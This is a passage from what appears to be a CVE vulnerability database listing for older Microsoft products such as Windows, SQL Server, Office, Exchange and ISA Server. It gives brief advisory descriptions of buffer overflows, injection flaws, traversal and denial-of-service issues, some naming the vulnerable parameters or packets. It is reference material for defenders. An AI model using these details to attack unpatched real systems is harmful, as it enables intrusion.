image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0204] Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0121] Argument injection vulnerability in Microsoft Outlook 2002 does not sufficiently filter parameters of mailto: URLs when using them as arguments when calling OUTLOOK.EXE, which allows remote attackers to use script code in the Local Machine zone and execute arbitrary programs. [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-1378] Microsoft Outlook Express 6.0 and Outlook 2000, with the security zone set to Internet Zone, allows remote attackers to execute arbitrary programs via an HTML email with the CODEBASE parameter set to the program, a vulnerability similar to CAN-2002-0077. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0904] Microsoft Exchange 2003 and Outlook Web Access (OWA), when configured to use NTLM authentication, does not properly reuse HTTP connections, which can cause OWA users to view mailboxes of other users when Kerberos has been disabled as an authentication method for IIS 6.0, e.g. when SharePoint Services 2.0 is installed. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0824] Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. [CVE-2003-0822] Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. [CVE-2003-0821] Microsoft Excel 97, 2000, and 2002 allows remote attackers to execute arbitrary code via a spreadsheet with a malicious XLM (Excel 4) macro that bypasses the macro security model. [CVE-2003-0820] Microsoft Word 97, 98(J), 2000, and 2002, and Microsoft Works Suites 2001 through 2004, do not properly check the length of the "Macro names" data value, which could allow remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2003-0819] Buffer overflow in the H.323 filter of Microsoft Internet Security and Acceleration Server 2000 allows remote attackers to execute arbitrary code in the Microsoft Firewall Service via certain H.323 traffic, as demonstrated by the NISCC/OUSPG PROTOS test suite for the H.225 protocol. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0665] Buffer overflow in the ActiveX control for Microsoft Access Snapshot Viewer for Access 97, 2000, and 2002 allows remote attackers to execute arbitrary code via long parameters to the control. [CVE-2003-0664] Microsoft Word 2002, 2000, 97, and 98(J) does not properly check certain properties of a document, which allows attackers to bypass the macro security model and automatically execute arbitrary macros via a malicious document. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0526] Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found." [CVE-2003-0506] Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to cause a denial of service (shutdown of NetMeeting conference) via malformed packets, as demonstrated via the chat conversation. [CVE-2003-0505] Directory traversal vulnerability in Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to read arbitrary files via "..\.." (dot dot) sequences in a file transfer request. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0232] Microsoft SQL Server 7, 2000, and MSDE allows local users to execute arbitrary code via a certain request to the Local Procedure Calls (LPC) port that leads to a buffer overflow. [CVE-2003-0231] Microsoft SQL Server 7, 2000, and MSDE allows local or remote authenticated users to cause a denial of service (crash or hang) via a long request to a named pipe. [CVE-2003-0230] Microsoft SQL Server 7, 2000, and MSDE allows local users to gain privileges by hijacking a named pipe during the authentication of another user, aka the "Named Pipe Hijacking" vulnerability. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0118] SQL injection vulnerability in the Document Tracking and Administration (DTA) website of Microsoft BizTalk Server 2000 and 2002 allows remote attackers to execute operating system commands via a request to (1) rawdocdata.asp or (2) RawCustomSearchField.asp containing an embedded SQL statement. [CVE-2003-0117] Buffer overflow in the HTTP receiver function (BizTalkHTTPReceive.dll ISAPI) of Microsoft BizTalk Server 2002 allows attackers to execute arbitrary code via a certain request to the HTTP receiver. [CVE-2003-0110] The Winsock Proxy service in Microsoft Proxy Server 2.0 and the Microsoft Firewall service in Internet Security and Acceleration (ISA) Server 2000 allow remote attackers to cause a denial of service (CPU consumption or packet storm) via a spoofed, malformed packet to UDP port 1745. [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0011] Unknown vulnerability in the DNS intrusion detection application filter for Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (blocked traffic to DNS servers) via a certain type of incoming DNS request that is not properly handled. [CVE-2003-0007] Microsoft Outlook 2002 does not properly handle requests to encrypt email messages with V1 Exchange Server Security certificates, which causes Outlook to send the email in plaintext, aka "Flaw in how Outlook 2002 handles V1 Exchange Server Security Certificates could lead to Information Disclosure." [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2003-0002] Cross-site scripting vulnerability (XSS) in ManualLogin.asp script for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary script via the REASONTXT parameter. [CVE-2002-2101] Microsoft Outlook 2002 allows remote attackers to execute arbitrary JavaScript code, even when scripting is disabled, via an "about:" or "javascript:" URI in the href attribute of an "a" tag. [CVE-2002-2100] Microsoft Outlook 2002 allows remote attackers to embed bypass the file download restrictions for attachments via an HTML email message that uses an IFRAME to reference malicious content. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1981] Microsoft SQL Server 2000 through SQL Server 2000 SP2 allows the "public" role to execute the (1) sp_MSSetServerProperties or (2) sp_MSsetalertinfo stored procedures, which allows attackers to modify configuration including SQL server startup and alert settings. [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1876] Microsoft Exchange 2000 allows remote authenticated attackers to cause a denial of service via a large number of rapid requests, which consumes all of the licenses that are granted to Exchange by IIS. [CVE-2002-1873] Microsoft Exchange 2000, when used with Microsoft Remote Procedure Call (MSRPC), allows remote attackers to cause a denial of service (crash or memory consumption) via malformed MSRPC calls. [CVE-2002-1872] Microsoft SQL Server 6.0 through 2000, with SQL Authentication enabled, uses weak password encryption (XOR), which allows remote attackers to sniff and decrypt the password. [CVE-2002-1776] DISPUTED NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to bypass virus protection via a Word Macro virus with a .nch or .dbx extension, which is automatically recognized and executed as a Microsoft Office document. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the Office plug-in would detect the virus before it is executed. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1256] The SMB signing capability in the Server Message Block (SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1255] Microsoft Outlook 2002 allows remote attackers to cause a denial of service (repeated failure) via an email message with a certain invalid header field that is accessed using POP3, IMAP, or WebDAV, aka "E-mail Header Processing Flaw Could Cause Outlook 2002 to Fail." [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1145] The xp_runwebtask stored procedure in the Web Tasks component of Microsoft SQL Server 7.0 and 2000, Microsoft Data Engine (MSDE) 1.0, and Microsoft Desktop Engine (MSDE) 2000 can be executed by PUBLIC, which allows an attacker to gain privileges by updating a webtask that is owned by the database owner through the msdb.dbo.mswebtasks table, which does not have strong permissions. [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2002-1138] Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, writes output files for scheduled jobs under its own privileges instead of the entity that launched it, which allows attackers to overwrite system files, aka "Flaw in Output File Handling for Scheduled Jobs." [CVE-2002-1137] Buffer overflow in the Database Console Command (DBCC) that handles user inputs in Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, allows attackers to execute arbitrary code via a long SourceDB argument in a "non-SQL OLEDB data source" such as FoxPro, a variant of CAN-2002-0644. [CVE-2002-1123] Buffer overflow in the authentication function for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows remote attackers to execute arbitrary code via a long request to TCP port 1433, aka the "Hello" overflow. [CVE-2002-1117] Veritas Backup Exec 8.5 and earlier requires that the "RestrictAnonymous" registry key for Microsoft Exchange 2000 must be set to 0, which enables anonymous listing of the SAM database and shares. [CVE-2002-1056] Microsoft Outlook 2000 and 2002, when configured to use Microsoft Word as the email editor, does not block scripts that are used while editing email messages in HTML or Rich Text Format (RTF), which could allow remote attackers to execute arbitrary scripts via an email that the user forwards or replies to. [CVE-2002-0982] Microsoft SQL Server 2000 SP2, when configured as a distributor, allows attackers to execute arbitrary code via the @scriptfile parameter to the sp_MScopyscript stored procedure. [CVE-2002-0975] Buffer overflow in Microsoft DirectX Files Viewer ActiveX control (xweb.ocx) 2.0.6.15 and earlier allows remote attackers to execute arbitrary via a long File parameter. [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0861] Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to bypass the "Allow paste operations via script" setting, even when it is disabled, via the (1) Copy method of the Cell object or (2) the Paste method of the Range object. [CVE-2002-0860] The LoadText method in the spreadsheet component in Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to read arbitrary files through Internet Explorer via a URL that redirects to the target file. [CVE-2002-0859] Buffer overflow in the OpenDataSource function of the Jet engine on Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code. [CVE-2002-0729] Microsoft SQL Server 2000 allows remote attackers to cause a denial of service via a malformed 0x08 packet that is missing a colon separator. [CVE-2002-0727] The Host function in Microsoft Office Web Components (OWC) 2000 and 2002 is exposed in components that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via the setTimeout method. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0721] Microsoft SQL Server 7.0 and 2000 installs with weak permissions for extended stored procedures that are associated with helper functions, which could allow unprivileged users, and possibly remote attackers, to run stored procedures with administrator privileges via (1) xp_execresultset, (2) xp_printstatements, or (3) xp_displayparamstmt. [CVE-2002-0719] SQL injection vulnerability in the function that services for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary commands via an MCMS resource request for image files or other files. [CVE-2002-0718] Web authoring command in Microsoft Content Management Server (MCMS) 2001 allows attackers to authenticate and upload executable content, by modifying the upload location, aka "Program Execution via MCMS Authoring Function." [CVE-2002-0700] Buffer overflow in a system function that performs user authentication for Microsoft Content Management Server (MCMS) 2001 allows attackers to execute code in the Local System context by authenticating to a web page that calls the function, aka "Unchecked Buffer in MDAC Function Could Enable SQL Server Compromise." [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0695] Buffer overflow in the Transact-SQL (T-SQL) OpenRowSet component of Microsoft Data Access Components (MDAC) 2.5 through 2.7 for SQL Server 7.0 or 2000 allows remote attackers to execute arbitrary code via a query that calls the OpenRowSet command. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0692] Buffer overflow in SmartHTML Interpreter (shtml.dll) in Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to cause a denial of service (CPU consumption) or run arbitrary code, respectively, via a certain type of web file request. [CVE-2002-0650] The keep-alive mechanism for Microsoft SQL Server 2000 allows remote attackers to cause a denial of service (bandwidth consumption) via a "ping" style packet to the Resolution Service (UDP port 1434) with a spoofed IP address of another SQL Server system, which causes the two servers to exchange packets in an infinite loop. [CVE-2002-0649] Multiple buffer overflows in the Resolution Service for Microsoft SQL Server 2000 and Microsoft Desktop Engine 2000 (MSDE) allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte that causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption, as exploited by the Slammer/Sapphire worm. [CVE-2002-0645] SQL injection vulnerability in stored procedures for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 may allow authenticated users to execute arbitrary commands. [CVE-2002-0644] Buffer overflow in several Database Consistency Checkers (DBCCs) for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows members of the db_owner and db_ddladmin roles to execute arbitrary code. [CVE-2002-0643] The installation of Microsoft Data Engine 1.0 (MSDE 1.0), and Microsoft SQL Server 2000 creates setup.iss files with insecure permissions and does not delete them after installation, which allows local users to obtain sensitive data, including weakly encrypted passwords, to gain privileges, aka "SQL Server Installation Process May Leave Passwords on System." [CVE-2002-0642] The registry key containing the SQL Server service account information in Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, has insecure permissions, which allows local users to gain privileges, aka "Incorrect Permission on SQL Server Service Account Registry Key." [CVE-2002-0641] Buffer overflow in bulk insert procedure of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows attackers with database administration privileges to execute arbitrary code via a long filename in the BULK INSERT query. [CVE-2002-0624] Buffer overflow in the password encryption function of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows remote attackers to gain control of the database and execute arbitrary code via SQL Server Authentication, aka "Unchecked Buffer in Password Encryption Procedure." [CVE-2002-0623] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 and 2002 allows remote attackers to execute arbitrary code via long authentication data, aka "New Variant of the ISAPI Filter Buffer Overrun". [CVE-2002-0622] The Office Web Components (OWC) package installer for Microsoft Commerce Server 2000 allows remote attackers to execute commands by passing the commands as input to the OWC package installer, aka "OWC Package Command Execution". [CVE-2002-0621] Buffer overflow in the Office Web Components (OWC) package installer used by Microsoft Commerce Server 2000 allows remote attackers to cause the process to fail or run arbitrary code in the LocalSystem security context via certain input to the OWC package installer. [CVE-2002-0620] Buffer overflow in the Profile Service of Microsoft Commerce Server 2000 allows remote attackers to cause the server to fail or run arbitrary code in the LocalSystem security context via an input field using an affected API. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0371] Buffer overflow in gopher client for Microsoft Internet Explorer 5.1 through 6.0, Proxy Server 2.0, or ISA Server 2000 allows remote attackers to execute arbitrary code via a gopher:// URL that redirects the user to a real or simulated gopher server that sends a long response. [CVE-2002-0368] The Store Service in Microsoft Exchange 2000 allows remote attackers to cause a denial of service (CPU consumption) via a mail message with a malformed RFC message attribute, aka "Malformed Mail Attribute can Cause Exchange 2000 to Exhaust CPU Resources." [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0187] Cross-site scripting vulnerability in the SQLXML component of Microsoft SQL Server 2000 allows an attacker to execute arbitrary script via the root parameter as part of an XML SQL query, aka "Script Injection via XML Tag." [CVE-2002-0186] Buffer overflow in the SQLXML ISAPI extension of Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code via data queries with a long content-type parameter, aka "Unchecked Buffer in SQLXML ISAPI Extension." [CVE-2002-0154] Buffer overflows in extended stored procedures for Microsoft SQL Server 7.0 and 2000 allow remote attackers to cause a denial of service or execute arbitrary code via a database query with certain long arguments. [CVE-2002-0152] Buffer overflow in various Microsoft applications for Macintosh allows remote attackers to cause a denial of service (crash) or execute arbitrary code by invoking the file:// directive with a large number of / characters, which affects Internet Explorer 5.1, Outlook Express 5.0 through 5.0.2, Entourage v. X and 2001, PowerPoint v. X, 2001, and 98, and Excel v. X and 2001 for Macintosh. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0050] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 allows remote attackers to execute arbitrary code via long authentication data. [CVE-2002-0049] Microsoft Exchange Server 2000 System Attendant gives "Everyone" group privileges to the WinReg key, which could allow remote attackers to read or modify registry keys. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1533] DISPUTED * Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service via a flood of fragmented UDP packets. NOTE: the vendor disputes this issue, saying that it requires high bandwidth to exploit, and the server does not experience any instability. Therefore this "laws of physics" issue might not be included in CVE. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1319] Microsoft Exchange 5.5 2000 allows remote attackers to cause a denial of service (hang) via exceptional BER encodings for the LDAP filter type field, as demonstrated by the PROTOS LDAPv3 test suite. [CVE-2001-1099] The default configuration of Norton AntiVirus for Microsoft Exchange 2000 2.x allows remote attackers to identify the recipient's INBOX file path by sending an email with an attachment containing malicious content, which includes the path in the rejection notice. [CVE-2001-0986] SQLQHit.asp sample file in Microsoft Index Server 2.0 allows remote attackers to obtain sensitive information such as the physical path, file attributes, or portions of source code by directly calling sqlqhit.asp with a CiScope parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo. [CVE-2001-0718] Vulnerability in (1) Microsoft Excel 2002 and earlier and (2) Microsoft PowerPoint 2002 and earlier allows attackers to bypass macro restrictions and execute arbitrary commands by modifying the data stream in the document. [CVE-2001-0666] Outlook Web Access (OWA) in Microsoft Exchange 2000 allows an authenticated user to cause a denial of service (CPU consumption) via a malformed OWA request for a deeply nested folder within the user's mailbox. [CVE-2001-0658] Cross-site scripting (CSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause other clients to execute certain script or read cookies via malicious script in an invalid URL that is not properly quoted in an error message. [CVE-2001-0628] Microsoft Word 2000 does not check AutoRecovery (.asd) files for macros, which allows a local attacker to execute arbitrary macros with the user ID of the Word user. [CVE-2001-0547] Memory leak in the proxy service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows local attackers to cause a denial of service (resource exhaustion). [CVE-2001-0546] Memory leak in H.323 Gatekeeper Service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (resource exhaustion) via a large amount of malformed H.323 data. [CVE-2001-0542] Buffer overflows in Microsoft SQL Server 7.0 and 2000 allow attackers with access to SQL Server to execute arbitrary code through the functions (1) raiserror, (2) formatmessage, or (3) xp_sprintf. NOTE: the C runtime format string vulnerability reported in MS01-060 is identified by CVE-2001-0879. [CVE-2001-0538] Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page. [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to 